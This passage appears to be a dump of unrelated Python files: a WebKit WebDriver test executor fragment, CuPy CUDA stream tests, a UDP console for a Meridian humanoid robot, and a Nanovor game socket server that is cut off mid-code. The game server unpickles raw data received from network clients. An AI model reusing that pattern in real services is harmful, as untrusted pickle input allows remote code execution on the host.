_log.warning(message) def _process_output(self, pid, command, data): _log.debug('(%s:%d): %s' % (os.path.basename(command).split()[0], pid, data)) def _log_func(level_name): def log(self, message): self._log_data(level_name.lower(), message=message) log.__name__ = str(level_name).lower() return log # Create all the methods on StructuredLog for debug levels. for level_name in structuredlog.log_levels: setattr(MessageLogger, level_name.lower(), _log_func(level_name)) class WebKitDriverServer(WebDriverServer): default_base_path = '/' test_env = None def __init__(self, logger, binary=None, port=None, base_path='', args=None): WebDriverServer.__init__(self, logger, binary, port=port, base_path=base_path, args=args, env=self.test_env) def make_command(self): return [self.binary, '--port=%s' % str(self.port)] + self._args class WebKitDriverProtocol(WebDriverProtocol): server_cls = WebKitDriverServer class WebDriverW3CExecutor(WdspecExecutor): protocol_cls = WebKitDriverProtocol def __init__(self, driver, server, env, timeout, expectations): WebKitDriverServer.test_env = env WebKitDriverServer.test_env.update(driver.browser_env()) server_config = {'browser_host': server.host(), 'domains': {'': {'': server.host()}, 'alt':{ '': '127.0.0.1'}}, 'ports': {'http': [str(server.port())]}, 'doc_root': server.document_root()} WdspecExecutor.__init__(self, driver.browser_name(), server_config, driver.binary_path(), None, capabilities=driver.capabilities()) self._timeout = timeout self._expectations = expectations self._test_queue = Queue() self._result_queue = Queue() def setup(self): self.runner = TestRunner() self.protocol.setup(self.runner) args = (self._test_queue, self._result_queue, self.protocol.session_config['host'], str(self.protocol.session_config['port']), json.dumps(self.protocol.session_config['capabilities']), json.dumps(self.server_config), self._timeout, self._expectations) self._process = Process(target=WebDriverW3CExecutor._runner, args=args) self._process.start() def teardown(self): self.protocol.teardown() self._test_queue.put('TEARDOWN') self._process = None @staticmethod def _runner(test_queue, result_queue, host, port, capabilities, server_config, timeout, expectations): if pytest_runner is None: do_delayed_imports() while True: test = test_queue.get() if test == 'TEARDOWN': break env = {'WD_HOST': host, 'WD_PORT': port, 'WD_CAPABILITIES': capabilities, 'WD_SERVER_CONFIG': server_config} env.update(WebKitDriverServer.test_env) args = ['--strict', '-p', 'no:mozlog'] result_queue.put(pytest_runner.run(test, args, timeout, env, expectations)) def run(self, test): self._test_queue.put(test) return self._result_queue.get()
test_stream.py
import gc import threading import unittest import pytest import cupy from cupy._creation import from_data from cupy import cuda from cupy import testing @testing.parameterize( *testing.product({ 'stream_name': ['null', 'ptds'], })) @testing.gpu class TestStream(unittest.TestCase): def setUp(self): if cuda.runtime.is_hip and self.stream_name == 'ptds': self.skipTest('HIP does not support PTDS') self._prev_stream = cuda.get_current_stream() if self.stream_name == 'null': self.stream = cuda.Stream.null elif self.stream_name == 'ptds': self.stream = cuda.Stream.ptds self.stream.use() def tearDown(self): self._prev_stream.use() @unittest.skipIf(cuda.runtime.is_hip, 'This test is only for CUDA') def test_eq_cuda(self): null0 = self.stream if self.stream == cuda.Stream.null: null1 = cuda.Stream(True) null2 = cuda.Stream(True) null3 = cuda.Stream(ptds=True) else: null1 = cuda.Stream(ptds=True) null2 = cuda.Stream(ptds=True) null3 = cuda.Stream(True) null4 = cuda.Stream() assert null0 == null1 assert null1 == null2 assert null2 != null3 assert null2 != null4 @unittest.skipIf(not cuda.runtime.is_hip, 'This test is only for HIP') def test_eq_hip(self): null0 = self.stream null1 = cuda.Stream(True) null2 = cuda.Stream(True) null3 = cuda.Stream() assert null0 == null1 assert null1 == null2 assert null2 != null3 def test_hash(self): hash(self.stream) hash(cuda.Stream(True)) hash(cuda.Stream(False)) mapping = {cuda.Stream(): 1, cuda.Stream(): 2} # noqa def check_del(self, null, ptds): stream = cuda.Stream(null=null, ptds=ptds).use() assert stream is cuda.get_current_stream() stream_ptr = stream.ptr x = from_data.array([1, 2, 3]) del stream assert stream_ptr == cuda.get_current_stream().ptr cuda.Stream.null.use() assert cuda.Stream.null is cuda.get_current_stream() # Want to test cudaStreamDestory is issued, but # runtime.streamQuery(stream_ptr) causes SEGV. We cannot test... del x def test_del_default(self): self.check_del(null=False, ptds=False) def test_del(self): null = self.stream == cuda.Stream.null if cuda.runtime.is_hip: ptds = False else: ptds = self.stream == cuda.Stream.ptds self.check_del(null=null, ptds=ptds) def test_get_and_add_callback(self): N = 100 cupy_arrays = [testing.shaped_random((2, 3)) for _ in range(N)] if not cuda.runtime.is_hip: stream = self.stream else: # adding callbacks to the null stream in HIP would segfault... stream = cuda.Stream() out = [] stream_list = [] def _callback(s, _, t): out.append(t[0]) stream_list.append(s.ptr) for i in range(N): numpy_array = cupy_arrays[i].get(stream=stream) stream.add_callback( _callback, (i, numpy_array)) stream.synchronize() assert out == list(range(N)) assert all(s == stream.ptr for s in stream_list) @unittest.skipIf(cuda.runtime.is_hip, 'HIP does not support launch_host_func') def test_launch_host_func(self): N = 100 cupy_arrays = [testing.shaped_random((2, 3)) for _ in range(N)] stream = cuda.Stream.null out = [] for i in range(N): numpy_array = cupy_arrays[i].get(stream=stream) stream.launch_host_func( lambda t: out.append(t[0]), (i, numpy_array)) stream.synchronize() assert out == list(range(N)) def test_with_statement(self): stream1 = cuda.Stream() stream2 = cuda.Stream() assert self.stream == cuda.get_current_stream() with stream1: assert stream1 == cuda.get_current_stream() with stream2: assert stream2 == cuda.get_current_stream() assert stream1 == cuda.get_current_stream() # self.stream is "forgotten"! assert cuda.Stream.null == cuda.get_current_stream() def test_use(self): stream1 = cuda.Stream().use() assert stream1 == cuda.get_current_stream() self.stream.use() assert self.stream == cuda.get_current_stream() @testing.multi_gpu(2) def test_per_device(self): with cuda.Device(0): stream0 = cuda.Stream() with stream0: assert stream0 == cuda.get_current_stream() with cuda.Device(1): assert stream0 != cuda.get_current_stream() assert cuda.Stream.null == cuda.get_current_stream() assert stream0 == cuda.get_current_stream() @testing.multi_gpu(2) def test_per_device_failure(self): with cuda.Device(0): stream0 = cuda.Stream() with cuda.Device(1): with pytest.raises(RuntimeError): with stream0: pass with pytest.raises(RuntimeError): stream0.use() def test_mix_use_context(self): # See cupy/cupy#5143 s1 = cuda.Stream() s2 = cuda.Stream() s3 = cuda.Stream() assert cuda.get_current_stream() == self.stream with s1: assert cuda.get_current_stream() == s1 s2.use() assert cuda.get_current_stream() == s2 with s3: assert cuda.get_current_stream() == s3 del s2 assert cuda.get_current_stream() == s1 # self.stream is "forgotten"! assert cuda.get_current_stream() == cuda.Stream.null def test_stream_thread(self): s1 = None def f1(barrier, errors): global s1 tid = barrier.wait() try: s1 = cuda.Stream() barrier.wait() # until t2 starts s1.use() barrier.wait() # until t2 uses the stream s1 = None gc.collect() barrier.wait() # until t2 decrefs the stream assert cuda.get_current_stream() is not None cupy.arange(10) errors[tid] = False except Exception as e: print(f'error in {tid}: {e}') def f2(barrier, errors): global s1 tid = barrier.wait() try: barrier.wait() # until t1 creates the stream s1.use() barrier.wait() # until t1 uses the stream s1 = None gc.collect() barrier.wait() # until t1 decrefs the stream assert cuda.get_current_stream() is not None cupy.arange(10) errors[tid] = False except Exception as e: print(f'error in {tid}: {e}') barrier = threading.Barrier(2) errors = [True, True] threads = [ threading.Thread(target=f1, args=(barrier, errors), daemon=True), threading.Thread(target=f2, args=(barrier, errors), daemon=True), ] del s1 for t in threads: t.start() for t in threads: t.join() for err in errors: assert err is False @testing.gpu class TestExternalStream(unittest.TestCase): def setUp(self): self.stream_ptr = cuda.runtime.streamCreate() self.stream = cuda.ExternalStream(self.stream_ptr) def tearDown(self): cuda.runtime.streamDestroy(self.stream_ptr) def test_get_and_add_callback(self): N = 100 cupy_arrays = [testing.shaped_random((2, 3)) for _ in range(N)] stream = self.stream out = [] for i in range(N): numpy_array = cupy_arrays[i].get(stream=stream) stream.add_callback( lambda _, __, t: out.append(t[0]), (i, numpy_array)) stream.synchronize() assert out == list(range(N)) @unittest.skipIf(cuda.runtime.is_hip, 'HIP does not support launch_host_func') def test_launch_host_func(self): N = 100 cupy_arrays = [testing.shaped_random((2, 3)) for _ in range(N)] stream = self.stream out = [] for i in range(N): numpy_array = cupy_arrays[i].get(stream=stream) stream.launch_host_func( lambda t: out.append(t[0]), (i, numpy_array)) stream.synchronize() assert out == list(range(N))
Meridian_console_v22_0418_osx.py
# #!/usr/bin/python3 # coding: UTF-8 # もしくは #!/usr/bin/env python など環境に合わせて #2022.02.05 UDP通信動作は安定。 #2022.02.05 COMMAND WINDOWのPOWERチェックボックスでサーボ電源ON #2022.02.05 上記サーボ電源ON中にスライドバー操作でサーボ動作(ただしスライドバーが小さいため大まかな動作確認のみに利用可) #2022.04.05 コードを少し整理整頓 #2022.04.14 各経路でのエラーの検知と表示の機能を搭載 #2022.04.14 ROSのパブリッシュボタンを追加。ROSのサブスクライブは未実装。 # # 取扱説明書 # ・起動方法 # 当ファイルがあるディレクトリにて、ターミナルより # python3 Meridian_console_v22_0415.py # と入力して実行します。必要に応じてライブラリをpip3で追加してください。 # UDP_RESV_IP,UDP_SEND_IPについては予め調べスクリプト上で書き換えておく必要があります。 # UDP_RESV_IPはターミナルにてip a もしくはipconfig,ifconfig等で調べられます。 # UDP_SEND_IPはESP32の起動時にPCシリアルモニタ上に表示されます。 # ・画面について # Command画面 # POWER: 全サーボのパワーをオンオフします # Action: サインカーブの首振りモーションを送信します # ->ROS1: ROS1のjointデータをパブリッシュします(Rvisと連動できます) # <-ROS1: ROS1のサブスクライブですが未実装です。 # Control Pad Monitor: リモコンの入力状態を標準化して表示します。 # Message画面 # IPと各経路のエラーカウント、エラー率、フレーム数、動作周波数を表示します # ResetCounter: カウンタの値をリセットするボタンです。 # TsySKIP, PcSKIP: 連番データの取りこぼし数を表示します(今はちょっと多めです。周波数を50Hzまで下げるとゼロになります。) # Sensor Monitor: MIUのデータを表示します。rol,pit,yawはセンサフュージョン値です。SetYawボタンでヨー軸の中央値をリセットできます。 # Axis Monitor: 各サーボの値です。パワーオン時にはスライダでサーボを動かすことができます。 # OSX版はROSが未搭載です from ast import Pass import numpy as np import socket from contextlib import closing import struct import math import dearpygui.dearpygui as dpg import threading import signal import time #import random import atexit #import sys #from re import I import rospy from sensor_msgs.msg import JointState import struct #定数 TITLE_VERSION="Meridian Console v22.0418_osx" #DPGのウィンドウタイトル兼バージョン表示 UDP_RESV_IP="192.168.1.xx" #このPCのIPアドレス UDP_RESV_PORT=22222 #受信ポート UDP_SEND_IP="192.168.1.xx" #送信先のESP32のIPアドレス UDP_SEND_PORT=22224 #送信ポート MSG_SIZE = 90 #Meridim配列の長さ(デフォルトは90) MSG_BUFF = MSG_SIZE * 2 #Meridim配列のバイト長さ STEP = 0.02 #1フレームあたりに増加させる制御処理用の数値 #マスターコマンド用の定数(Meridim配列0番に格納する値) CMD_SET_YAW_CENTER = 1002 #IMUのヨー軸センターリセットコマンド #制御コマンド用フラグ等 flag_update_yaw_center = 0 #IMUのヨー軸センターリセットフラグ(python内部用) flag_servo_power = 0 #全サーボのパワーオンオフフラグ flag_send_data = 0 #状態データ送信モードのオンオフフラグ(サーボパワーオフでもデータ送信可能) flag_send_motion = 0 #計算モーション送信のオンオフフラグ flag_ros1_pub = 0 #ROS1のjoint_statesのパブリッシュ flag_ros1_sub = 0 #ROS1のjoint_statesのサブスクライブ #UDP用のsocket設定 sock=socket.socket(socket.AF_INET,socket.SOCK_DGRAM) sock.bind((UDP_RESV_IP,UDP_RESV_PORT)) #エラー集計表示用変数 loop_count = 0 #フレーム数のカウンタ error_count_esp_to_pc = 0 #PCからESP32へのUDP送信でのエラー数 error_count_pc_to_esp = 0 #ESP32からPCへのUDP送信でのエラー数 error_count_esp_to_tsy = 0 #ESPからTeensyへのSPI通信でのエラー数 error_count_tsy_to_esp = 0 #TeensyからESP32へのSPI通信でのエラー数 error_count_tsy_skip = 0 #Teensyが受信したデータがクロックカウントスキップしていたか error_count_pc_skip = 0 #PCが受信したデータがクロックカウントスキップしていたか frame_clock = 0 #送信するframe_clock(0-199) frame_clock_resv = 0 #今回受信したframe_clock frame_clock_resv_past = 0#前回受信したframe_clock start = time.time() # フレームレート計測用のタイマー初期値 #Meridim配列関連 r_meridim_disp=list(range(MSG_SIZE)) #Meridim配列の受信値short表示用 r_meridim_disp_char=list(range(MSG_SIZE*2)) #Meridim配列の受信値char表示用 r_meridim=[0]*MSG_SIZE #Meridim配列の送信値用 s_meridim=[0]*MSG_SIZE #Meridim配列の送信値用 s_meridim_motion=[0]*MSG_SIZE #Meridim配列のPC側で作成したサーボ位置命令送信用 #メッセージ表示用 message0 = "This PC's IP adress is "+UDP_RESV_IP message1 = "" message2 = "" message3 = "" #モーション計算用変数 x = 0 #増分計算用 (STEPずつ) y = 0 #増分計算用 (1ずつ) #def udpresv(): # pass # デ ー タ の 送 受 信 ######################################################################### def meridian_loop(): global message0 global message1 global message2 global message3 global x global y while (True): print("checksss") message1 = "Waiting for UDP data from "+UDP_SEND_IP+"..." with closing(sock): while True: global loop_count global r_meridim_disp global r_meridim_disp_char global s_meridim_motion global error_count_pc_to_esp global error_count_esp_to_tsy global error_count_tsy_to_esp global error_count_esp_to_pc global error_count_tsy_skip global error_count_pc_skip global frame_clock global frame_clock_resv global frame_clock_resv_past global flag_servo_power global flag_ros1_pub global flag_ros1_sub loop_count += 1 #このpythonを起動してからのフレーム数をカウントアップ r_bin_data,addr = sock.recvfrom(1472)#UDPに受信したデータを転記 r_meridim=struct.unpack('90h',r_bin_data) r_meridim_disp_char=struct.unpack('180b',r_bin_data) message1 = "UDP data receiving from "+UDP_SEND_IP checksum = np.array([0], dtype=np.int16) for i in range(MSG_SIZE-1): checksum[0] += r_meridim[i] r_meridim_disp[i]=r_meridim[i] checksum[0] = ~checksum[0] #print("[Calc] ",checksum[0]) #print("[Ans ] ",r_meridim[MSG_SIZE-1]) temp = np.array([0], dtype=np.int16) # エラーフラグ各種のカウントアップ if checksum[0] == r_meridim[MSG_SIZE-1]: if (r_meridim_disp[88] >> 14 & 1) == 1:#エラーフラグ14ビット目(ESP32のPCからのUDP受信のエラーフラグ)を調べる error_count_pc_to_esp += 1 if (r_meridim_disp[88] >> 13 & 1) == 1:#エラーフラグ13ビット目(TeensyのESP32からのSPI受信のエラーフラグ)を調べる error_count_esp_to_tsy += 1 if (r_meridim_disp[88] >> 12 & 1) == 1:#エラーフラグ12ビット目(ESPのTeensyからのSPI受信のエラーフラグ)を調べる error_count_tsy_to_esp += 1 if (r_meridim_disp[88] >> 9 & 1) == 1:#エラーフラグ12ビット目(ESPのTeensyからのSPI受信のエラーフラグ)を調べる error_count_tsy_skip += 1 temp[0] = r_meridim[88] & 0b0111111111111111 #エラーフラグ15ビット目(PCのUDP受信エラーフラグ)を下げる else: temp[0] = r_meridim[88] | 0b1000000000000000 #エラーフラグ15ビット目(PCのUDP受信エラーフラグ)を上げる error_count_esp_to_pc += 1 #クロックの受信 frame_clock_resv_past = frame_clock_resv #前回受信したクロックを今回のpastとしてキープ frame_clock_resv = r_meridim_disp[88] & 0b0000000011111111 #クロックを受信 if(frame_clock_resv == frame_clock_resv_past + 1): #受信したクロックが送信したものから+2であればスキップなし temp[0] &= 0b1111111011111111 #PCのスキップフラグを下げる elif((frame_clock_resv == 0 ) and (frame_clock_resv_past == 199)): temp[0] &= 0b1111111011111111 #PCのスキップフラグを下げる else: print("Found data skipping on PC.") temp[0] |= 0b0000000100000000 #PCのスキップフラグを上げる error_count_pc_skip += 1 #スキップカウントをプラス #送信用クロックの準備 frame_clock += 1 #送信用のframe_clockをカウントアップ if frame_clock >199: frame_clock=0 temp[0] &= 0b1111111100000000 #下位8ビットをクリア temp[0] += frame_clock #下位8ビットに受信カウントに+1したものを格納 #PC側サーボ位置発信用に最終サーボ情報をキープ if flag_servo_power == 2: #サーボオンボタン押下初回のみ最終受け取りサーボ情報をキープ for i in range(21,81,2): s_meridim_motion[i] = r_meridim[i] flag_servo_power = 1 #送信データのベースを受信データのコピーで作成する s_meridim=[] s_meridim=list(r_meridim) #キープしたエラーフラグ/送信クロックを格納 s_meridim[88] = temp[0] #PC側でサーボ位置を計算制御する場合は以下でデータを作成 if flag_send_motion == 1: # # xをフレームごとにカウントアップ x += STEP y += 1 if y>10000: y = 0 if x>100: x = 0 #print(np.sin(x)," " ,x) s_meridim_motion[51] = int(np.sin(x)*3000) #プラマイ10度の間でサインカーブを出力 #サーボオンオフフラグチェック:サーボオンフラグを格納 if flag_servo_power > 0: for i in range(20,80,2): s_meridim[i] = 1 s_meridim[i+1] = s_meridim_motion[i+1] else: for i in range(20,80,2): s_meridim[i] = 0 #マスターコマンドフラグチェック:ヨー軸センターリセットコマンドを格納 global flag_update_yaw_center if (flag_update_yaw_center > 0): flag_update_yaw_center -= 1 s_meridim[0] = CMD_SET_YAW_CENTER if (flag_update_yaw_center==0): print("Send COMMAND 'Set Yaw Center.':["+str(CMD_SET_YAW_CENTER)+"]") #格納した送信データについてチェックサムを追加 checksum[0] = 0 checksum_int = 0 for i in range(MSG_SIZE-1): checksum_int += s_meridim[i] checksum[0] = ~checksum_int s_meridim[MSG_SIZE-1]=checksum[0] time.sleep(2/1000) #少し休む場合 #データをパックしてUDP送信 s_bin_data=struct.pack('90h',*s_meridim) sock.sendto(s_bin_data,(UDP_SEND_IP,UDP_SEND_PORT)) #print("Frame "+str(int(frame_clock_resv - frame_clock_resv_past))) now = time.time()-start message2="ERROR COUNT ESP-PC:"+str("{:}".format(error_count_esp_to_pc))+\ " PC-ESP:"+str("{:}".format(error_count_pc_to_esp))+" ESP-TSY:"+str("{:}".format(error_count_esp_to_tsy))+" TsySKIP:"+\ str("{:}".format(error_count_tsy_skip))+" PcSKIP:"+str("{:}".format(error_count_pc_skip))+\ " Frames:"+str(loop_count)+" "+str(int(loop_count/now))+"Hz" message3="ERROR RATE ESP-PC:"+str("{:.2%}".format(error_count_esp_to_pc/loop_count))+\ " PC-ESP:"+str("{:.2%}".format(error_count_pc_to_esp/loop_count))+" ESP-TSY:"+str("{:.2%}".format(error_count_esp_to_tsy/loop_count)) # 関 数 各 種 ######################################################################### def cleanup():#ctrl+cで終了したときにも確実にソケットを閉じる試み(いまのところ機能していない) print("Meridan_console quited.") atexit.register(cleanup)#この行は機能しているかどうかわからない def set_servo_power():#チェックボックスに従いサーボパワーオンフラグをオンオフ global flag_servo_power if flag_servo_power == 0 : flag_servo_power = 2 print("Servo Power ON") else: flag_servo_power = 0 print("Servo Power OFF") def set_data():#チェックボックスに従いデータ送信フラグをオンオフ global flag_send_data if flag_send_data == 0 : flag_send_data = 1 print("Start sending Data.") else: flag_send_data = 0 print("Quit sending Data.") def set_action():#チェックボックスに従いアクション送信フラグをオンオフ global flag_send_motion if flag_send_motion == 0 : flag_send_motion = 1 print("Start Motion Data Streaming.") else: flag_send_motion = 0 print("Quit Motion Data Streaming.") def ros1_pub():#チェックボックスに従いROS1パブリッシュフラグをオンオフ global flag_ros1_pub if flag_ros1_pub == 0 : flag_ros1_pub = 1 print("Start publishing ROS1 joint_states.") else: flag_ros1_pub = 0 print("Quit publishing ROS1 joint_states.") def ros1_sub():#チェックボックスに従いROS1サブスクライブフラグをオンオフ global flag_ros1_sub if flag_ros1_sub == 0 : flag_ros1_sub = 1 print("Start subscribing ROS1 joint_states.") else: flag_ros1_sub = 0 print("Quit publishing ROS1 joint_states.") def set_servo_angle(sender, app_data):# global s_meridim_motion if sender[3]=="L": s_meridim_motion[int(sender[4:6])*2+21] = int(app_data*100) print(f"L meri: {int(sender[4:6])*2+21}") if sender[3]=="R": s_meridim_motion[int(sender[4:6])*2+51] = int(app_data*100) print(f"R meri: {int(sender[4:6])*2+51}") print(f"sender is: {sender[3]}") print(f"sender is: {sender[4:6]}") print(f"app_data is: {int(app_data*100)}") print(f"motion is: {s_meridim_motion[int(sender[4:6])+21]}") # dearpygui に よ る コ ン ソ ー ル 画 面 描 写 ######################################################################### def main(): #global checksum global r_meridim # dpg用関数 ================================================== def set_yaw_center():#IMUのヨー軸センターリセットフラグを10上げる(コマンドを10回送信する) global flag_update_yaw_center flag_update_yaw_center = 20 def reset_counter():#カウンターのリセット global loop_count global error_count_pc_to_esp global error_count_esp_to_tsy global error_count_tsy_to_esp global error_count_esp_to_pc global error_count_tsy_skip global error_count_pc_skip global start loop_count = 1 error_count_pc_to_esp = 0 error_count_esp_to_tsy = 0 error_count_tsy_to_esp = 0 error_count_esp_to_pc = 0 error_count_tsy_skip = 0 error_count_pc_skip = 0 start = time.time() while(True): # R O S 1 joint_statesのパブリッシュ ===================================================================================== # 未導入 # ==================================================================================================== # dpg描画 ================================================== dpg.create_context() dpg.create_viewport(title=TITLE_VERSION, width=600, height=480) # (画面左上)サーボ位置モニタリング用のウィンドウ ================================================== with dpg.window(label="Axis Monitor", width=250, height=350,pos=[5,5]): with dpg.group(label='LeftSide'): for i in range(0, 15, 1): dpg.add_slider_float(default_value=0, tag="ID L"+str(i),label="L"+str(i),max_value=100,min_value=-100,callback=set_servo_angle,pos=[10,35+i*20], width=80) with dpg.group(label='RightSide'): for i in range(0, 15, 1): dpg.add_slider_float(default_value=0, tag="ID R"+str(i),label="R"+str(i),max_value=100,min_value=-100,callback=set_servo_angle,pos=[135,35+i*20], width=80) # (画面下段)メッセージ表示用ウィンドウ(アドレス・通信エラー等) ================================================== with dpg.window(label="Messege", width=590, height=115,pos=[5,360]): dpg.add_button(label="ResetCounter", callback=reset_counter, width =90, pos=[470,30]) dpg.add_text(message0,tag="DispMessage0") dpg.add_text(message1,tag="DispMessage1") dpg.add_text(message2,tag="DispMessage2") dpg.add_text(message3,tag="DispMessage3") # (画面右側)センサー値モニタリング用ウィンドウ ================================================== with dpg.window(label="Sensor Monitor", width=335, height=175,pos=[260,5]): with dpg.group(label='LeftSide'): dpg.add_slider_float(default_value=0, tag="mpu0", label="ac_x",max_value=327,min_value=-327,pos=[10,35], width=60) dpg.add_slider_float(default_value=0, tag="mpu1", label="ac_y",max_value=327,min_value=-327,pos=[115,35], width=60) dpg.add_slider_float(default_value=0, tag="mpu2", label="ac_z",max_value=327,min_value=-327,pos=[220,35], width=60) dpg.add_slider_float(default_value=0, tag="mpu3", label="gr_x",max_value=327,min_value=-327,pos=[10,55], width=60) dpg.add_slider_float(default_value=0, tag="mpu4", label="gr_y",max_value=327,min_value=-327,pos=[115,55], width=60) dpg.add_slider_float(default_value=0, tag="mpu5", label="gr_z",max_value=327,min_value=-327,pos=[220,55], width=60) dpg.add_slider_float(default_value=0, tag="mpu6", label="mg_x",max_value=327,min_value=-327,pos=[10,75], width=60) dpg.add_slider_float(default_value=0, tag="mpu7", label="mg_y",max_value=327,min_value=-327,pos=[115,75], width=60) dpg.add_slider_float(default_value=0, tag="mpu8", label="mg_z",max_value=327,min_value=-327,pos=[220,75], width=60) dpg.add_slider_float(default_value=0, tag="mpu9", label="temp",max_value=327,min_value=-327,pos=[10,95], width=60) dpg.add_slider_float(default_value=0, tag="mpu10", label="rol",max_value=327,min_value=-327,pos=[10,120], width=60) dpg.add_slider_float(default_value=0, tag="mpu11", label="pit",max_value=327,min_value=-327,pos=[115,120], width=60) dpg.add_slider_float(default_value=0, tag="mpu12", label="yaw",max_value=327,min_value=-327,pos=[220,120], width=60) dpg.add_button(label="SetYaw", callback=set_yaw_center, width =50, pos=[270,148]) # (画面右側中央段)コマンド送信/リモコン値表示用ウィンドウ ================================================== with dpg.window(label="Command", width=335, height=170,pos=[260,185]): dpg.add_checkbox(label="Power", tag="Power", callback=set_servo_power, pos=[8,27]) dpg.add_checkbox(label="Action", tag="Action", callback=set_action, pos=[8,50]) dpg.add_checkbox(label="->ROS1", tag="ROS1pub", callback=ros1_pub, pos=[100,27]) dpg.add_checkbox(label="<-ROS1", tag="ROS1sub", callback=ros1_sub, pos=[100,50]) dpg.add_text("Control Pad Monitor", pos=[10,100]) dpg.add_text("button",tag="pad_button", pos=[170,100]) dpg.add_slider_int(default_value=0, tag="pad_Lx", label="Lx",max_value=127,min_value=-127, pos=[10,120], width=40) dpg.add_slider_int(default_value=0, tag="pad_Ly", label="Ly",max_value=127,min_value=-127, pos=[90,120], width=40) dpg.add_slider_int(default_value=0, tag="pad_Rx", label="Rx",max_value=127,min_value=-127, pos=[170,120], width=40) dpg.add_slider_int(default_value=0, tag="pad_Ry", label="Ry",max_value=127,min_value=-127, pos=[250,120], width=40) dpg.add_slider_int(default_value=0, tag="pad_L2v", label="L2v",max_value=255,min_value=0, pos=[90,140], width=40) dpg.add_slider_int(default_value=0, tag="pad_R2v", label="R2v",max_value=255,min_value=0, pos=[170,140], width=40) # dpg変数値の登録 with dpg.value_registry(): dpg.add_int_value(tag="button_data") dpg.setup_dearpygui() dpg.show_viewport() # dpg 描 画 内 容 の デ ー タ 更 新 ================================================== while dpg.is_dearpygui_running(): signal.signal(signal.SIGINT, signal.SIG_DFL) #メッセージ欄の表示更新 dpg.set_value("DispMessage0", message0) #メッセージ欄表示用 dpg.set_value("DispMessage1", message1) #メッセージ欄表示用 dpg.set_value("DispMessage2", message2) #メッセージ欄表示用 dpg.set_value("DispMessage3", message3) #メッセージ欄表示用 #サーボデータとIMUデータの表示更新 for i in range(0, 15, 1): #global button idld = r_meridim_disp[21+i*2] idrd = r_meridim_disp[51+i*2] idsensor = r_meridim_disp[i+2]/10000 dpg.set_value("ID L"+str(i), idld/100) #サーボIDと数値の表示L側 dpg.set_value("ID R"+str(i), idrd/100) #サーボIDと数値の表示R側 if i < 13: #IMUデータの更新 if i < 11: dpg.set_value("mpu"+str(i),idsensor) else: dpg.set_value("mpu"+str(i),idsensor*100) #リモコンデータの表示更新 dpg.set_value("pad_button", str(r_meridim_disp[80])) dpg.set_value("pad_Lx", r_meridim_disp_char[163]) dpg.set_value("pad_Ly", r_meridim_disp_char[162]) dpg.set_value("pad_Rx", r_meridim_disp_char[165]) dpg.set_value("pad_Ry", r_meridim_disp_char[164]) padL2val = (r_meridim_disp_char[167]) if (padL2val<0): padL2val = 256+padL2val if (r_meridim_disp[80]&256==0): padL2val = 0 padR2val = (r_meridim_disp_char[166]) if (padR2val<0): padR2val = 256+padR2val if (r_meridim_disp[80]&512==0): padR2val = 0 dpg.set_value("pad_L2v", padL2val) dpg.set_value("pad_R2v", padR2val) dpg.set_value("button_data", r_meridim_disp[80]) #dpg表示更新処理 dpg.render_dearpygui_frame() dpg.destroy_context() #スレッド2つで送受信と画面描写を並列処理 if __name__ == '__main__': thread1 = threading.Thread(target=meridian_loop) #dearpyguiによるコンソール画面描写スレッド thread1.start() main()
server.py
import socket import pickle import threading from NanovorCollection import* from OnlineGame import OnlineGame import sys, os HOST = "" PORT = 50500 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) s.bind((HOST, PORT)) s.listen(5) #Contains lists of ongoing games gameID = 0 games = {} #Contains each clients socket as a key, and the ID of the game they're in as a value clients = {} server_magnamod_list = MAGNAMOD_LIST server_velocitron_list = VELOCITRON_LIST server_hexite_list = HEXITE_LIST server_custom_list = CUSTOM_LIST server_complete_list = COMPLETE_LIST #Whether or not to include custom nanovor in the games. FANOVOR = True def handle_client(conn, addr): try: global gameID global FANOVOR connected = True magnamod_list = server_magnamod_list[:] velocitron_list = server_velocitron_list[:] hexite_list = server_hexite_list[:] custom_list = server_custom_list[:] complete_list = server_complete_list[:] while connected: data = pickle.loads(conn.recv(4096*8)) if data: if type(data) == dict and "SetFanovorSettings" in data: FANOVOR = data["SetFanovorSettings"] conn.send(pickle.dumps("Job completed")) elif type(data) == tuple: if data[0].isdigit(): # data[0] has the number of players the user chose to play, data[1] is the users username # (Players should have already entered the game, maybe..) inGame = False #Iterate through a copy so that if you add a new game, you don't iterate through the dict while changing it for ID,game in games.copy().items(): if game.game_size() == int(data[0]): if not(game.full()): games[ID].add_player((conn,data[1])) clients[conn] = ID else: games[gameID] = OnlineGame(int(data[0]), complete_list) games[gameID].add_player((conn,data[1])) clients[conn] = gameID gameID += 1 inGame = True if not inGame: games[gameID] = OnlineGame(int(data[0]), complete_list) games[gameID].add_player((conn,data[1])) clients[conn] = gameID gameID += 1 if games[clients[conn]].full(): conn.send(pickle.dumps("Match is starting!")) else: conn.send(pickle.dumps("Waiting on more players")) elif data == "Check Status": if games[clients[conn]].full(): conn.send(pickle.dumps("Match is starting!")) else: conn.send(pickle.dumps("Waiting on more players")) elif data == "GetMags": conn.sendall(pickle.dumps([(mag.get_name(), mag.get_sv()) for mag in magnamod_list])) elif data == "GetVels": conn.sendall(pickle.dumps([(vel.get_name(), vel.get_sv()) for vel in velocitron_list])) elif data == "GetHexs": conn.sendall(pickle.dumps([(hex.get_name(), hex.get_sv()) for hex in hexite_list])) elif data == "GetCust": conn.sendall(pickle.dumps([(cust.get_name(), cust.get_sv()) for cust in custom_list] if FANOVOR else [])) elif type(data) == list: if data[0] == "SwarmSelected": games[clients[conn]].set_swarm(conn,data[1]) conn.send(pickle.dumps("Swarm Confirmed")) #data[1] gives the swarm of the player (each Nanovor is a string) elif data == "Match Status": conn.send(pickle.dumps(games[clients[conn]].ready())) elif data == "Game Ongoing": over = games[clients[conn]].gameOver(conn) conn.send(pickle.dumps(over)) if over == "You were eliminated!": break #This will be True if over is anything except False, None, 0, or empty. If string or dict gets returned, it goes off as True elif over: break elif data == "Get Active Nanovor": info = games[clients[conn]].gameInformation(conn)["Active Nanovor"] conn.send(pickle.dumps(info)) elif data == "Get Player Swarm": info = games[clients[conn]].gameInformation(conn)["Player Swarm"] conn.send(pickle.dumps(info)) elif data == "Get Player Attacks": info = games[clients[conn]].gameInformation(conn)["Player Attacks"] conn.send(pickle.dumps(info)) elif data == "Get Opponent Active": info = games[clients[conn]].gameInformation(conn)["Opponent Active"] conn.send(pickle.dumps(info)) elif data == "Energy & Overrides": info = games[clients[conn]].gameInformation(conn)["Energy & Overrides"] conn.send(pickle.dumps(info)) elif data == "Get All Swarms": info = games[clients[conn]].gameInformation(conn)["All Swarms"] 